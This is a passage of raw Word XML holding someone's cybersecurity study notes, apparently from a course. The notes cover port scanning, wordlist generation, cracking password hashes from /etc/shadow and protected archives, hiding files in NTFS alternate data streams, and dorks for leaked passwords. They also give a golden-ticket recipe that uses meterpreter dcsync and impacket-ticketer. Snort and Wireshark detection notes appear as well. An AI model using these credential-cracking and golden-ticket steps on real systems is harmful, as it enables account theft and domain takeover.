      </w:r>
    </w:p>
    <w:p w14:paraId="35501F3E" w14:textId="20E73325" w:rsidR="00D8498F" w:rsidRDefault="00D8498F" w:rsidP="0062346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98F">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8498F">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8498F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>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timeout 30 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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masscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Pr="00D849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 U:1-100</w:t>
      </w:r>
      <w:r w:rsidR="00B102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limit the time of the scan to 30 seconds, and scan all the port between 1-100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA273F5" w14:textId="77777777" w:rsidR="00D8498F" w:rsidRDefault="00D8498F"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E678E" w14:textId="77777777" w:rsidR="00E204D2" w:rsidRDefault="00E204D2"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E944FA" w14:textId="7DD1C3D6" w:rsidR="00723AB1" w:rsidRPr="000C387E" w:rsidRDefault="00723AB1" w:rsidP="00723AB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Crunch</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51E60F64" w14:textId="725B8A7A" w:rsidR="00723AB1" w:rsidRDefault="00723AB1" w:rsidP="008E373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Crunch 4 7 1234hd &gt;&gt; file.txt – minimum 4 chars, maximum 7 chars, the possible chars are 1234hd, save all the options of passwords to file.txt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small letters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big letters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numbers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replace symbols</w:t>
      </w:r>
      <w:r w:rsidR="000164C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crunch 7 7 -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000164C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lior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000164C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&gt;&gt; symbol.txt – the flag -t has to come when using char that replace group of characters as ^, the file will contain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000164C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lior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000164C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(constant) word then more 3 symbols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E52C8E3" w14:textId="77777777" w:rsidR="00EF4C60" w:rsidRDefault="00EF4C60"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FB1D9" w14:textId="77777777" w:rsidR="0044046E" w:rsidRDefault="0044046E"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D9E26A" w14:textId="481114FA" w:rsidR="0044046E" w:rsidRPr="000C387E" w:rsidRDefault="0044046E" w:rsidP="0044046E">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John The Ripper</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7213275C" w14:textId="22B6156D" w:rsidR="0044046E" w:rsidRDefault="0044046E"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john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/shadow – try to crack the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/shadow file while using it default list of passwords called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password.lst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will success only if the word very common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/shadow --wordlist = ./new_list.txt – use the list of passwords to crack the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/shadow --wordlist = ./new_list.txt --format  </w:t>
      </w:r>
      <w:r w:rsidR="00FC20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crypt – use the list of passwords to crack the file and use the format we wrote</w:t>
      </w:r>
      <w:r w:rsidR="00FC20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sudo /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC20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sidR="00FC20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/shadow --format  = crypt --show – it will show the password we already cracked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B283D60" w14:textId="77777777" w:rsidR="009F3651" w:rsidRDefault="00FC205C"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rar2john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crackme.rar</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&gt;&gt; hash.txt – save the hash of the password of the file, the same for files like zip2john, pdf2john, 7z2john, then all left is to crack it with john or other tools.</w:t>
      </w:r>
      <w:r w:rsidR="00AD3C2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bitlocker2john -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD3C2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AD3C2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D3C2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locked.vmdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD3C2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hash.txt - extract hash of password of memory file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404CD9F9"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60E090"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CF8B1C"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7A026F"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EABAD1"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65640"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97D62E"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1E4EBB" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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7F139" w14:textId="77777777"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5D8433" w14:textId="28DCC5D9" w:rsidR="009F3651" w:rsidRPr="000C387E" w:rsidRDefault="009F3651" w:rsidP="009F365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Snort</w:t>
      </w:r>
      <w:r w:rsidRPr="00A716BA">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p w14:paraId="48C5645A" w14:textId="5AF120DF" w:rsidR="009F3651" w:rsidRDefault="009F3651"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IDS/IPS snort – it’s a tool for creating rules to pop up an alert when something </w:t>
      </w:r>
      <w:r w:rsidRPr="009F36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exceptional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happens</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31B3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part of cisco, it</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contains many types of fields as:</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msg – the message will pop up</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sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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snort ID, the id of the rule</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offset – from each byte start to check</w:t>
      </w:r>
      <w:r w:rsidR="00EA275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depth –  how many bytes to investigate</w:t>
      </w:r>
      <w:r w:rsidR="00AA413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content – which string to search</w:t>
      </w:r>
      <w:r w:rsidR="00AA413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rev – which version of the rule (we need to change manually the number when we change the rule so we could track on it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC5523" w14:textId="77777777" w:rsidR="00110024" w:rsidRDefault="00EA275D"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Alert ICMP 10.10.10.10 any -&gt; any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(msg: “ICMP attempt attack”; sid:1000005) – alert us if the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 from any port exist will talk to any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every port in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icmp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message, </w:t>
      </w:r>
      <w:r w:rsidR="001100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will pop the message “ICMP attempt attack”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6782CE49" w14:textId="3EF7FBB3" w:rsidR="00EF4C60" w:rsidRPr="009C77E4" w:rsidRDefault="00110024" w:rsidP="009C77E4">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Alert TCP 10.10.10.10/24 any -&gt; any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content:”HTTP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offset:4; depth:40;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msg:”HTTP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matched”;) – if there is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communication between every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in10.10.10.10/24 in every port to any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any port, it will check between 5-44 bytes and search for HTTP string, if found I will pop the message  “HTTP matched”</w:t>
      </w:r>
      <w:r w:rsidR="009F365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FC20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BF3FF4F" w14:textId="77777777" w:rsidR="00EF4C60" w:rsidRDefault="00EF4C60"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EA8515" w14:textId="77777777" w:rsidR="00883A17" w:rsidRPr="00294C81" w:rsidRDefault="00883A17" w:rsidP="00883A17">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 commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEA14B4" w14:textId="436F8278" w:rsidR="008C066C" w:rsidRDefault="00480370" w:rsidP="0048037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 8.8.8.8 – check the connection (may not respond even where there is a connection if the destination block the ICMP protocol)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ping -a 8.8.8.8 – check the connection and resolve to hostname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883A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tasklist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00883A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shows processes that running on the machine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8C066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taskkill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C066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shows all the options of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C066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taskkill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C066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 like -h in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C066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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02BD2D0C" w14:textId="77777777" w:rsidR="00883A17" w:rsidRDefault="00883A17" w:rsidP="00883A1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cls</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clear the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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EF66F90" w14:textId="0589AED8" w:rsidR="003000B5" w:rsidRDefault="00883A17" w:rsidP="00E42462">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user – shows a list of users</w:t>
      </w:r>
      <w:r w:rsidR="00C567D6">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 user administrator – show info the user administrator as local group and last logon and more</w:t>
      </w:r>
      <w:r w:rsid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000B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user soc 123 /add – add new user called soc with the password 123</w:t>
      </w:r>
      <w:r w:rsid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42462"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user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E42462"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CyberJunkie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E42462"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/delete</w:t>
      </w:r>
      <w:r w:rsid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delete the user</w:t>
      </w:r>
      <w:r w:rsidR="00425D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25D14" w:rsidRPr="00425D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user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00425D14"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CyberJunkie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00425D14"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5D1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1234 -change password of user</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user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007255CC"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CyberJunkie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007255CC"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active:yes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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enable user</w:t>
      </w:r>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user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007255CC"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CyberJunkie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007255CC" w:rsidRPr="00E4246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7255CC" w:rsidRP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active:no</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007255C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disable user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14186B5D" w14:textId="77777777" w:rsidR="00E96AF9"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findstr</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for a word like grep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6AC6B5" w14:textId="77777777" w:rsidR="00E96AF9"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 print the current time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCD5EF8" w14:textId="31C19A23" w:rsidR="00E96AF9"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ipconfig – display network config</w:t>
      </w:r>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ipcon</w:t>
      </w:r>
      <w:r w:rsidR="00F3563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w:t>
      </w:r>
      <w:r w:rsidR="00F3563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displaydns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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resolver cache, all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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addresses the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC0D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resolved and saved it for better search in the next time</w:t>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ipconfig /release – return you </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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(you will lost connection)</w:t>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ipconfig /renew </w:t>
      </w:r>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F50F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for new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>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tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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8.8.8.8 – show all the path in the way to get to this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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006D297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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE23C0B" w14:textId="2E2638E1" w:rsidR="003000B5" w:rsidRDefault="00E96AF9" w:rsidP="003000B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cd – show current path, like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pwd</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cd .. – go back one directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B61E0" w14:textId="68592A7D" w:rsidR="003715FF" w:rsidRDefault="00E96AF9" w:rsidP="00EF4C60">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w:t>
      </w:r>
      <w:r w:rsidR="003715F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 and directories, like ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA4120C" w14:textId="77777777" w:rsidR="0043317B" w:rsidRDefault="003715FF" w:rsidP="003715F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 enter a file, like cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EF829B" w14:textId="75AF6B1D" w:rsidR="00804B18" w:rsidRDefault="00804B18" w:rsidP="00804B1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netstat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known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netstat -a – know option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04B18">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option tells netstat to display all connections and listening ports. It includes both TCP and UDP ports, regardless of their state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04B18">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option instructs netstat to display addresses and port numbers in numerical form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default, netstat attempts to determine and display the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of the remote address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04B18">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804B1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option adds the Process ID (PID) associated with each connection to the output. This is crucial for identifying which processes on your system are creating which connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C950AD" w14:textId="59672F0E" w:rsidR="00CC4C4B" w:rsidRDefault="00CC4C4B" w:rsidP="00804B18">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tasklist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shows all the tasks/processes and their PID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taskkill</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/PID 5072 – stop the process PID 5072</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2601B16A" w14:textId="77777777" w:rsidR="00C4612C" w:rsidRDefault="00FF725F"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/b pic.jpg+sec.zip pic1.jpg – hide the file using ADS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 for see files that hidden in ADS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notepad vac7.jpg:secret.txt – open the text hidden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mspaint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vac7.jpg:pic.jpg – open the </w:t>
      </w:r>
      <w:r w:rsidR="00A37D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 hidden file</w:t>
      </w:r>
      <w:r w:rsidR="00A37D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A37D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firefox.ink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A37D8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F:\ADS\vac7.jpg:bomb.pdf – open the pdf hidden file</w:t>
      </w:r>
      <w:r w:rsidR="008A772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type vac2.jpeg &gt; vac1.jpeg:vac2.jpeg – hide the file vac2.jpeg behind vac1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F849334" w14:textId="77777777" w:rsidR="000E1FB5" w:rsidRDefault="00C4612C"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mftdump.exe $MFT /o mf.txt – convert the $MFT to text file (need the mftdump.exe file for that) than you can drag the text file to the excel and see the data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6363FF3A" w14:textId="7FB52F69" w:rsidR="00296C76" w:rsidRDefault="00883A17"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E279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3D753D3" w14:textId="77777777" w:rsidR="00873EBB" w:rsidRDefault="00873EBB"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F33307" w14:textId="77777777" w:rsidR="00873EBB" w:rsidRDefault="00873EBB"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0B7AD9"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91575C"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7394D1"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88BFAB"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ADF61"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B0B36D"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0D9BE9" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00FF725F">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244ACA" w14:textId="77777777" w:rsidR="005E279D" w:rsidRDefault="005E279D" w:rsidP="00296C7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4C1B16" w14:textId="4FEC0C90" w:rsidR="00C97ECA" w:rsidRPr="00C97ECA" w:rsidRDefault="00C97ECA" w:rsidP="00C97ECA">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Wireshark filter syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C4D3A" w14:textId="7389AB10" w:rsidR="002D2B47" w:rsidRDefault="005E279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ip.src</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10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidR="00D27AC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D27AC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ip.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D27AC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10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidR="009E3A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9E3A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ip.addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E3A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10.10.10.10 – search for packets with this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E3A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009E3A5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in source or destination</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eth.src</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(MAC address)</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packets with this source MAC address</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eth.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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(MAC address) – search packets with this destination MAC address</w:t>
      </w:r>
      <w:r w:rsidR="006628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6628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eth.addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0066281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08:8A… - search for packets that with this MAC address in source or destination</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dns.qry.name == “xxx.com” – search for domain name</w:t>
      </w:r>
      <w:r w:rsidR="00E9081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udp.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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5355 – scan for specific </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:r w:rsidR="008A57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8A57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tcp.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A57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445 – scan for specific </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A57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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A577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w:t>
      </w:r>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ip.version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 – search for only ipv4 packets</w:t>
      </w:r>
      <w:r w:rsidR="003718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3718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ip.version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0037181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6 – search for only ipv6 packets</w:t>
      </w:r>
      <w:r w:rsidR="002D2B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frame contains “login” – search for packets that contain the wor</w:t>
      </w:r>
      <w:r w:rsidR="00B75E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2D2B4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w:t>
      </w:r>
      <w:r w:rsidR="00B75E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B75E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http.request.method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B75E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&amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B75E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ip.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B75E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10.10.10.10 – filter for all the packets with get that specific </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B75E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00B75E8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shows there</w:t>
      </w:r>
      <w:r w:rsidR="000C1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0C1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http.request.uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000C1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contains “.gif” – search for specific word inside http protocol</w:t>
      </w:r>
      <w:r w:rsidR="000C1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0C1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tcp.flag.syn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000C1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&amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000C1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tcp.flag.ack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000C1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 shows all the packets that syn is defined but ack does not, which happen when someone scanning ports</w:t>
      </w:r>
      <w:r w:rsidR="00CD1EA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not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD1EA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arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD1EA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F837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exclude</w:t>
      </w:r>
      <w:r w:rsidR="00CD1EA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F837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arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F8372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packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F00461"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188989"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46500"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49B186"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0262D5"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2EC042"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74C57"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FAB866"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EA1A1C"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9CFAD"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9F21F5"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CEE357"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61C594"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064A14"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1180BB" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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309916"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A714E" w14:textId="77777777" w:rsidR="00813D0D" w:rsidRDefault="00813D0D"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C23E8" w14:textId="13C3E844" w:rsidR="00847C8A" w:rsidRPr="00C97ECA" w:rsidRDefault="00847C8A" w:rsidP="00847C8A">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Tshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F7DDB" w14:textId="440141B0" w:rsidR="00847C8A" w:rsidRDefault="00660D7F" w:rsidP="002D2B47">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Tshark</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 CLI for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wireshark</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 use it for make automations or search for thing more easily.</w:t>
      </w:r>
      <w:r w:rsidR="007710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when hardening to find the right filter, you can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007710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wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0077103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choose the wanted field, choose “use as filter” and you will see the syntax, th</w:t>
      </w:r>
      <w:r w:rsidR="00ED035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you can write this filter in -Y flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CC2B4" w14:textId="2E12FF44" w:rsidR="00DE0241" w:rsidRDefault="00E957E7" w:rsidP="00DE024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tshark</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eth0 – capture packets (you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in this terminal during this time)</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tshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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eth0 -w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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class.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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the amount of packets it captured and write it to this file</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 – flag for sniff packets</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 – flag for use exist file of packets</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-Y/--display-filter - -Y is a shorthand of --display-filter, it filter as the syntax of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>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 – flag for get certain field inside the packets</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-z – flag for the statistics of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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--export-objects – flag for extract files</w:t>
      </w:r>
      <w:r w:rsidR="00CF6E4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 fields – for specify </w:t>
      </w:r>
      <w:r w:rsidR="00115F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type of info</w:t>
      </w:r>
      <w:r w:rsidR="00115F4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 – for name the field, type -e for every field</w:t>
      </w:r>
      <w:r w:rsidR="00390A2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-v – shows the header of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00390A2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framee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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cap.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:r w:rsidR="00C6267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ip.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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==10.10.10.10 &amp;&amp; http’ – the flag -r for open the file, and the flag -Y for filter to this source </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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00EF488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http protocol</w:t>
      </w:r>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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cap.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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‘http’ -T fields -e ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ip.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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filter for http packets and get only their </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ip.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005675E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field</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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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cap.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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–export-objects </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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http,files_http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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extract the files that received in http protocol and save them inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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files_http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00813D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directory</w:t>
      </w:r>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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net.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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frame.number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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==161” -T fields -e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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tcp.dstport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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udp.dstport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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for frame 161 and print the destination </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C1532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ports</w:t>
      </w:r>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Tshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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net.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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conv,ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 the statistics of conversations, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A27EB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p>
    <w:p w14:paraId="46F89160" w14:textId="1C36DF15" w:rsidR="0080350A" w:rsidRDefault="00A27EB3" w:rsidP="00DE024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shark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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net.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 fields -e ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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eth.addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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sed ‘s/,/ /g’ | awk ‘{for(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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spellStart"/>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&lt;=NF; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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{print $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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sort | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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wc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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shows all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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eth.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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eth.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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groups of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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eth.src,eth.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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the sed switch the , in space, and the awk make all the two columns to one column, and the sort </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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wc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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uniqe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00950D1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ethernet addresses in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D46935" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="009D0E12" w:rsidRDefault="009C77E4" w:rsidP="00DE024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090DAF" w14:textId="622ACA55" w:rsidR="0080350A" w:rsidRPr="00294C81" w:rsidRDefault="00294C81" w:rsidP="00294C81">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dorks syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B98E2A7" w14:textId="77777777" w:rsidR="00090CBC" w:rsidRDefault="0080350A"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filetype: csv site: za budget – search for csv files from za area that has connection to the word “budget”, there is not : before the word “budget” so it make free search on it.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site: Pastebin.com intext </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gov.il passwords – search in the site Pastebin.com words in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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conext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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gov.il passwords.</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inurl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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spellEnd"/>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intitle – search inside title</w:t>
      </w:r>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filetype – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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txt,csv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00772D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more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D6ACC" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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63F6B0" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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2008CC" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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FA36D1" w14:textId="77777777" w:rsidR="00DE253C" w:rsidRDefault="00DE253C" w:rsidP="00882BF3">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FCD7AF" w14:textId="1FF4A8BE" w:rsidR="00DE253C" w:rsidRPr="00294C81" w:rsidRDefault="00DE253C" w:rsidP="00DE253C">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Creating Golden Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18493C76" w14:textId="3DA7F201" w:rsidR="00A42FA5" w:rsidRDefault="00DE253C"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create golden ticket we need 3 </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1. Domain Name</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 SID</w:t>
      </w:r>
      <w:r w:rsidR="00A42FA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3. KRBTGT hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D349EB4" w14:textId="54F7F449" w:rsidR="00702525" w:rsidRDefault="00702525" w:rsidP="0070252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spellStart"/>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krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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account is a default service account in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icrosoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ctive </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irectory used by the Kerberos Key Distribution Center (KDC) service. This account's primary function is to sign and encrypt Ticket Granting Tickets (TGTs) used within the Kerberos authentication process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564511" w14:textId="7CB14D9E" w:rsidR="00A42FA5" w:rsidRDefault="00A42FA5"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get domain name we can use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tool.</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To get SID we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use 2 ways, but we need session to the machine for that.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we can run the command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whoami</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and find the SID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or we can use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meterpreter</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 to use kiwi commands, firstly we need to write “load kiwi” to load kiwi commands, then use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dcsync_ntlm</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krbtgt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we will find in the output the SID, also the third thing we looked for, the NTLM hash.</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then, by running the next command we can create the golden ticket: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impacket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-ticketer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nthash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA63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-domain-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FA63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sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA63E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50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s-1…. -domain … hack3r -dc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D50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003D50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10.10.10.10 – we need the insert the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D50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nthash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D50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found, the SID we found, the name of the domain, the user</w:t>
      </w:r>
      <w:r w:rsid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want to impersonate to (we can choose any exist user and we will prefer high privilege user as admin)</w:t>
      </w:r>
      <w:r w:rsidR="003D50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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D50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003D50F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DC</w:t>
      </w:r>
